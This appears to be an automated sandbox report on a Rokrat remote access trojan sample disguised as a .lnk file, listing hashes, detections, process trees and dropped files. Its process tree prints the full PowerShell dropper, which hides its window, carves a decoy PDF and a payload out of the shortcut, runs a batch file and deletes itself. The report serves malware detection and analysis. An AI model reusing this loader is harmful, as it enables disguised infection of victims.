rokrat | cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13

Analysis

max time kernel
24s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
22-02-2024 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3.lnk
Size

52.0MB
MD5

acf4085b2fa977fc1350f0ddc2710502
SHA1

7155d89bae9acd67f5d8cdf651b73ee6b54262c3
SHA256

cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13
SHA512

4aa010f680485f0241cbaff77d3a21509e2f73c4fdfe1940aa63f46949fcb39404e4a2c543c465098806b7059fab234de48fe9996ba1edd9c4a9b7b6ca1dbe70
SSDEEP

24576:0Zthnqtka+Dj8bI6c94TuDjoZgRXTTYdy830QtO0oIJjW7sFAc1Mh5D2y8:U9OQj85c91wZgjbaJa7d2y8

Score

10^/10

rokrat rat

Malware Config

Signatures

Detect Rokrat payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2976-167-0x000000000C130000-0x000000000C213000-memory.dmp	family_rokrat
behavioral1/memory/2976-168-0x000000000C130000-0x000000000C213000-memory.dmp	family_rokrat

Rokrat
Rokrat is a remote access trojan written in c++.
rat rokrat
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

2652 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

cmd.exe

pid process

2608 cmd.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2652 powershell.exe
2976 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2652 powershell.exe
Token: SeDebugPrivilege 2976 powershell.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

AcroRd32.exe

pid process

1520 AcroRd32.exe
1520 AcroRd32.exe
1520 AcroRd32.exe

pid	process
2652	powershell.exe

pid	process
2608	cmd.exe

pid	process
2652	powershell.exe
2976	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe

pid	process
1520	AcroRd32.exe
1520	AcroRd32.exe
1520	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exepowershell.execsc.execmd.exepowershell.execsc.execsc.execsc.execsc.exe

description	pid	process	target process
PID 2732 wrote to memory of 2608	2732	cmd.exe	cmd.exe
PID 2732 wrote to memory of 2608	2732	cmd.exe	cmd.exe
PID 2732 wrote to memory of 2608	2732	cmd.exe	cmd.exe
PID 2732 wrote to memory of 2608	2732	cmd.exe	cmd.exe
PID 2608 wrote to memory of 2832	2608	cmd.exe	cmd.exe
PID 2608 wrote to memory of 2832	2608	cmd.exe	cmd.exe
PID 2608 wrote to memory of 2832	2608	cmd.exe	cmd.exe
PID 2608 wrote to memory of 2832	2608	cmd.exe	cmd.exe
PID 2608 wrote to memory of 2652	2608	cmd.exe	powershell.exe
PID 2608 wrote to memory of 2652	2608	cmd.exe	powershell.exe
PID 2608 wrote to memory of 2652	2608	cmd.exe	powershell.exe
PID 2608 wrote to memory of 2652	2608	cmd.exe	powershell.exe
PID 2652 wrote to memory of 2968	2652	powershell.exe	csc.exe
PID 2652 wrote to memory of 2968	2652	powershell.exe	csc.exe
PID 2652 wrote to memory of 2968	2652	powershell.exe	csc.exe
PID 2652 wrote to memory of 2968	2652	powershell.exe	csc.exe
PID 2968 wrote to memory of 2984	2968	csc.exe	cvtres.exe
PID 2968 wrote to memory of 2984	2968	csc.exe	cvtres.exe
PID 2968 wrote to memory of 2984	2968	csc.exe	cvtres.exe
PID 2968 wrote to memory of 2984	2968	csc.exe	cvtres.exe
PID 2652 wrote to memory of 1520	2652	powershell.exe	AcroRd32.exe
PID 2652 wrote to memory of 1520	2652	powershell.exe	AcroRd32.exe
PID 2652 wrote to memory of 1520	2652	powershell.exe	AcroRd32.exe
PID 2652 wrote to memory of 1520	2652	powershell.exe	AcroRd32.exe
PID 2652 wrote to memory of 2856	2652	powershell.exe	cmd.exe
PID 2652 wrote to memory of 2856	2652	powershell.exe	cmd.exe
PID 2652 wrote to memory of 2856	2652	powershell.exe	cmd.exe
PID 2652 wrote to memory of 2856	2652	powershell.exe	cmd.exe
PID 2856 wrote to memory of 2976	2856	cmd.exe	powershell.exe
PID 2856 wrote to memory of 2976	2856	cmd.exe	powershell.exe
PID 2856 wrote to memory of 2976	2856	cmd.exe	powershell.exe
PID 2856 wrote to memory of 2976	2856	cmd.exe	powershell.exe
PID 2976 wrote to memory of 1376	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 1376	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 1376	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 1376	2976	powershell.exe	csc.exe
PID 1376 wrote to memory of 2816	1376	csc.exe	cvtres.exe
PID 1376 wrote to memory of 2816	1376	csc.exe	cvtres.exe
PID 1376 wrote to memory of 2816	1376	csc.exe	cvtres.exe
PID 1376 wrote to memory of 2816	1376	csc.exe	cvtres.exe
PID 2976 wrote to memory of 1904	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 1904	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 1904	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 1904	2976	powershell.exe	csc.exe
PID 1904 wrote to memory of 1104	1904	csc.exe	cvtres.exe
PID 1904 wrote to memory of 1104	1904	csc.exe	cvtres.exe
PID 1904 wrote to memory of 1104	1904	csc.exe	cvtres.exe
PID 1904 wrote to memory of 1104	1904	csc.exe	cvtres.exe
PID 2976 wrote to memory of 2148	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 2148	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 2148	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 2148	2976	powershell.exe	csc.exe
PID 2148 wrote to memory of 2088	2148	csc.exe	cvtres.exe
PID 2148 wrote to memory of 2088	2148	csc.exe	cvtres.exe
PID 2148 wrote to memory of 2088	2148	csc.exe	cvtres.exe
PID 2148 wrote to memory of 2088	2148	csc.exe	cvtres.exe
PID 2976 wrote to memory of 1980	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 1980	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 1980	2976	powershell.exe	csc.exe
PID 2976 wrote to memory of 1980	2976	powershell.exe	csc.exe
PID 1980 wrote to memory of 2916	1980	csc.exe	cvtres.exe
PID 1980 wrote to memory of 2916	1980	csc.exe	cvtres.exe
PID 1980 wrote to memory of 2916	1980	csc.exe	cvtres.exe
PID 1980 wrote to memory of 2916	1980	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\3.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x03401DD6} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0007EEC5;$lnkFile.Read($pdfFile, 0, 0x0007EEC5);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000804F1,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x001598F3,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x00159E9D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
3⤵
PID:2832

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x03401DD6} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0007EEC5;$lnkFile.Read($pdfFile, 0, 0x0007EEC5);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000804F1,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x001598F3,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x00159E9D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
3⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0m_dwtml.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2968

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES848C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC847B.tmp"
5⤵
PID:2984

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\3.pdf"
4⤵
- Suspicious use of SetWindowsHookEx
PID:1520

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'temp.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2976

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bas09ope.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCAB0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCAAF.tmp"
7⤵
PID:1104

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_fykawac.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\my11ocal.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ta5iseni.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1376

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB0D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCB0C.tmp"
1⤵
PID:2088

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB6B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCB6A.tmp"
1⤵
PID:2916

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA52.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCA51.tmp"
1⤵
PID:2816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0m_dwtml.dll

Filesize
3KB

MD5
22cae6665cef38e2eae04ef87359a3bf

SHA1
acf10e17ddaebe7a33ef28ec043cbda8d00fd276

SHA256
9cbc3dd7807c0114f29f5d47c2913fdac35b66f5d3ff38e0f9b93c41e42aeb12

SHA512
078e586415b4d78af97f2c65ac6e55ff5d1ea9b533661382f6e28e624fe673af1072178c98c820de0e05dc7d85e864c44fdd34aab9a2e1b45f65b81632103eb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\0m_dwtml.pdb

Filesize
7KB

MD5
44248cac9b26a14ec235202fc11de746

SHA1
543b6a69e2ae8bd6929630f95f10d6851fcfb635

SHA256
7be9e6b7a05bb644c4bbcdc1eee9778061594ea5c3764cfa1f9ac8f5879d157c

SHA512
07e7370ef752fd6143f4d436b0fafaab063d078bcb9a937731af214996e4da72ca49f1c9da4529d146b4facbbbc24b2d611dc05c598df3a5da90124127365d44

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.pdf

Filesize
497KB

MD5
523e721f2bab86af9449d49664ca70d9

SHA1
32ec74bf872e803997f38ded151f31b26e623449

SHA256
9c7fcfdadf497e55a7e2e2f43c7a14dd45e04636084fbf5376331cac5ce4439c

SHA512
683c5b56fcf04caca27e307d5ab92587f74f10cc6b78da99507e21346c9cbe8d88689274027a48e2e923263e3770adc192cd60f8f97cded44197a7b935b54e82

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE36E.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES848C.tmp

Filesize
1KB

MD5
3f22846339e258e74af5ba95bc6bded1

SHA1
20b8d34bc8baa7b6841ba07be8d7f12351eb01fb

SHA256
abcc3a0b393e6a12d31b767daf2bc7f76b264c5cffd74e1aa6e92b8e22bd7960

SHA512
468165420618ee61adb0c0bf570f2ed13e3168f92203efa8d8841570035c8ad8007fd2d83ce777be5bb5653e85f1fbba0b7945b31b777120e1f60581c352718a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCA52.tmp

Filesize
1KB

MD5
b5b3375713fc68735bee26761666bf32

SHA1
0b2203a1e5798211c8ec1b91de1d77703a50a081

SHA256
1f5155b49aff8682296be1cf0665b1e72b3b9c3772e3d0996b03d9bcc5da5e30

SHA512
a81064b6e0d3429d8b96ad0f38fd5c041a267d51e5ae4183425d6607a3cd61e3bcfc3caee64d01f4599400dcf413ad9d84283f70a0ff7bca8ea3d58f779fe610

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCAB0.tmp

Filesize
1KB

MD5
6cd827f826b85d90dd84c0cd7935246c

SHA1
bacb725859b7a920d7304af06dad6ff5f892d98b

SHA256
b61ac2a5797fff4ca657b764ea8546dec75a86d025dd8a067591b16a1b6a02ed

SHA512
f0e4121952c3a69d0d733ea28cb2c7aa2b61c4d595e5f0afc277961dc7e5f4884870b6c3d9a4357715d79c94684afd3fac5e67981b0f46b0c73913c694531e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCB0D.tmp

Filesize
1KB

MD5
48568c254bfabc9e41f0b0f0fc1a1b7e

SHA1
b85f8871d71c708d216c1e239aa7fc90a42ad33a

SHA256
d4a9d45e73cf3e138480cc11ea2860a593b79b95fd38bd47d88445b0ef283b7a

SHA512
45c694ba0a8fde9f5afe0c6a23090256ea33cd32bf9b6c36728533c3f424c05d8dd8ad2e42bc3b2cca6ecaa7e8cd64bcfc1331d28ad02c884dcb74d4143f7e1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCB6B.tmp

Filesize
1KB

MD5
f565c033be0cfe899003914a319f9a1f

SHA1
bd752c1c73d0093c2efb35e8706d8c6ccb8b9d06

SHA256
9cfb1e0d16c502bbbba385fe86c371cead5c1a2a5a2e175cc3a4d23123ca12b0

SHA512
47d122ff1cf06eb474bbfc7d1048dfafd8ae1f138cad4184dfc8ea86d4fd6d43b4ece9b4dbea96e71974eeb7b3d31ec83db4195e7b534f1ad0158080439b63fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarE391.tmp

Filesize
160KB

MD5
eb1289b4e5a895f0d3228da796c14603

SHA1
9c2f9a48bd85ee869dcbbac36fe15e89b8041949

SHA256
4e257b782ccb605f188a1846ccbafc4c7387a01091073f1c8f78dfd75daac87d

SHA512
58c9b5fb3c5b3dbabdc16848a7a3031ccc5840663d7035d73fe3c69913c1d8404a951f6f11d5fc3ee6fb1fd76d31ae93cc8515772d71681f3a2f3c443e47ba5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_fykawac.dll

Filesize
3KB

MD5
ca2911b3e44dc93eaf0f3c0ba6217b00

SHA1
c1e48eebd6dd4c17e789ece2971cf4d24d35224c

SHA256
49c897fa89ac1eb04effea07a76c75f48cd453aa971b607c6bc2423d532d0415

SHA512
aedafac04fa0e8d9df3f979085f72d9545f680b03617586fb17e3db63f1ebc8dbc2a96a36434fb165d9559ede54512ebeda0a82731ad0d3eded5bbc51c556eef

Download Submit
C:\Users\Admin\AppData\Local\Temp\_fykawac.pdb

Filesize
7KB

MD5
cc83affd8a9d4a62e02e138eab6a814b

SHA1
76d1cf6a5342c90c33776c3c4a176123473a2681

SHA256
26a5d7414c2ef23bb99aa90acefec3aae987477a856b3201f029fb3353294035

SHA512
cdb2fa30fdfd75987297189375a9a4c9e6607a70e40b38591ebdbde7558afff867ab75c6d18a0abab05696ac014252648cc8abb3ef432516508984e2f3d254a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\bas09ope.dll

Filesize
3KB

MD5
ade69521066ab50b080e23b609ff1993

SHA1
be74aba65c510dc0dbe0121df88b4da19213915f

SHA256
e4c8dab41d3c83b61d8358559aa77e41f36807ccda87db956828f70e12123c24

SHA512
be6cd0978f5c506af5a11c3f61811830a48bc4d30f202eadb8f546f95839876312b49250f1bae8ce050e287e8b62d9847e6e84b0dce8a13efe408fa3cf988eac

Download Submit
C:\Users\Admin\AppData\Local\Temp\bas09ope.pdb

Filesize
7KB

MD5
426f98209488087894698dd706562e28

SHA1
778f38b826110803a5fbd9da5a6853114e1c3a89

SHA256
8ce891c371a466abc45295ac1d3317d0c7e7ed3563e85286e48d46bb3458b867

SHA512
a23331992c599a25b8c2fdf13675558b66c44339f31671ffef4d02fccf3566713645ebcc827948b26f312d69f8b86afe75087e428cec0dc2ee5ad69f86af4f8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\my11ocal.dll

Filesize
3KB

MD5
c00c3d572d4d13aafea182dce81dccec

SHA1
14d6e32b674730e109fc74b61af63cda6bf09697

SHA256
d6225cad0c7af444172c87cd3c8e9be7417b8d1b22c184fc2c4058eaafe18066

SHA512
bdbe4ff506159366aec352a2a9ada64c49504898b54a63c6c42474df92338f3293786f16910e30fd0ab7c3a85004013aae1e91864632a10c282facd0c8c2c018

Download Submit
C:\Users\Admin\AppData\Local\Temp\my11ocal.pdb

Filesize
7KB

MD5
6ce5af1c36113be07312c6d9669bff7f

SHA1
7e86cc5f322103fac0942b634033944cf1d8a0e0

SHA256
a8e4d87af57fdd87f1b69aeb185250b9f746f988256ba5b79381ae0027e4ec68

SHA512
39cd9fb2e9430895d7c630b748eacfac3c11246846c5d5c79cb52ee5f364e36e51abba1452411737cbac2444f96f80c0a74407e2a8f8d9cc95df009f8b97e619

Download Submit
C:\Users\Admin\AppData\Local\Temp\ta5iseni.dll

Filesize
3KB

MD5
90cb9194827065c38df21aa1d5a2de9f

SHA1
c979ffab841d1821e9fb0f8aa85eb23187c084a4

SHA256
c187f2b342ea6a398788bfb2d199d4cb7d13964e24440c72a74a6593aa16343f

SHA512
ccf142f53660cd8a52b78454123104ece5d66bce505df2cc9ec57b9cf47c555e2af0cb0a31dff3d075b72b76e8cbf71dcc69f1c9d85f69258e55d0109645db57

Download Submit
C:\Users\Admin\AppData\Local\Temp\ta5iseni.pdb

Filesize
7KB

MD5
4febf7951a12854614f4d5236aeffad3

SHA1
37a5c75253578aed9e6dca5a31cabe6e457d7680

SHA256
dd62af214047ec4686b201e8ac48b0f567463782f5a644e3b3f2f39279f29f5d

SHA512
f36e5e5d6658cec77b572c682124e042a1543087f587049ddb225a69140e95db7b5ac514664d74aacc6b42c2ccb305c8f96182312825fb189d5912b82b3a80bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.dat

Filesize
1KB

MD5
78480139d86520ba82766c5b3c9a7479

SHA1
436e5aa0ef8c97a0b78a4289d19860c1ab8c1f1a

SHA256
85438bc7af4c48130c1fd51f8a02eb13b8d57b983411b15fa7f03a302e8e6d8c

SHA512
bc5ce718cf3330ab56a131e874785bd86eef4aa19281d3225401f9e33b798dac6cb6e3e58ba2780d9f3a223a7e16e50f1f64a01d03e1b6e78ea56778cfd449d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\working.bat

Filesize
311B

MD5
a1640eb8f424ebe13b94955f8d0f6843

SHA1
8551e56c3e19861dbcae87f83b6d0ab225c3793d

SHA256
6c0b21b211ba77b42631e1a2a010f858b8664a8bd0149573596a8cdd72e7c399

SHA512
6b40b95ac1979a81ed44f991375dc94fda64b872c79c18111d72210a24867811d925acae4b87d378bd9f1adc86cb9adcf359ff873be7e4579869bd7418d466c8

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
07a8c60fa26e587d1515221de51d7b08

SHA1
10db28ad436656fa582b141b621a11ef7db9072d

SHA256
f94fcfbb92a86f6ac4513b9d85a856632def80aad1f53dbe595092be6625f06c

SHA512
4f9b94a6f41173b060c1a11058b7ae4154c0b1d6c5a46006b49e5b3ffead1f54adb080ee07cdf529ab527beb7564eb062941b8eb35ceff6aa9a516529cf54bca

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EQZ7NSG142G6IH47I40K.temp

Filesize
7KB

MD5
169be9f5c6bf050458aa5c9d9dc3ff78

SHA1
c0d5d849c87e0e3f75216c295d111fc7e4a706fc

SHA256
92a0d1a7f23d5ab378157e92a69cbe4fb7ccf4a14a5d7767e1fa89243c30cd13

SHA512
1bd84622da8a11d69fe66ecdcf129b98c38585224160a4bcde8cd9c2b7dc147f4a737ccf43344673e810ea2ec31ca08dc700fafea9a566267b83ff2cef766f62

Download Submit
C:\Users\Public\public.dat

Filesize
46KB

MD5
4371751cd905a946ad066e34f2ab74e6

SHA1
e4aa58fd8f9571efffc38ddfbc453a5bdaad78e5

SHA256
9de161a1340d9924226bb19205c2c6d4304f08755a86d168f461dc9204b75438

SHA512
a61f0deceb7d5426feb5ac7124ad6c2eb338fe430bea5e6f6cada0bad6f41b045be823feeb99f083efa2464de70597c49214b4d2ec0ab10142a824cfc445f744

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0m_dwtml.0.cs

Filesize
334B

MD5
60a1152ec32b816b91530c7814deaacd

SHA1
68f979631b0485aaae41203c4b14f9ce710dbd6f

SHA256
e4ec47a88eab9b07792d97b02ce1724cb45118860e8156bdeb9f7268b0c258d2

SHA512
58de87e6877b5495a250b8af6117a29fd32ae169086f37ad640a2b8eac6500b62daf0340410094765984381025bcdde750bd250088d3e4840f7aa72e9459eb65

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0m_dwtml.cmdline

Filesize
309B

MD5
f7d02965e272b5006880c606a4899c0d

SHA1
cb2c07e2e3fbd5bfa29d7d5d23a28af2ea3042c6

SHA256
27570db2a141faf7abb47c61686c6b72c7469b01a050c9973572f452abcd437e

SHA512
a925d5809a5dea065bd36ad95d5f3edd87ef3f114aa016b9cebaddb9b8cb14ae49ac4302c9ed70c7d5fded6442c391f44e006ca666dffdc1928dec399efb2ce1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC847B.tmp

Filesize
652B

MD5
b0451ad244eb9d931bdaf0a0a9a40286

SHA1
d6337a521829b352f8f1af14c5c0d038282d7794

SHA256
aad7c831b27f842c0cad0f8a5c8e04f51afada318e6797b14c1a4a1f63fce175

SHA512
fcdcafe767e460080effb6cabb5d48aabc4bc70ea692d8df4bdca3a41c43441787f74534d6e776171d4e722e4a5046a73495547a45915881c4dd34064c429bfa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCCA51.tmp

Filesize
652B

MD5
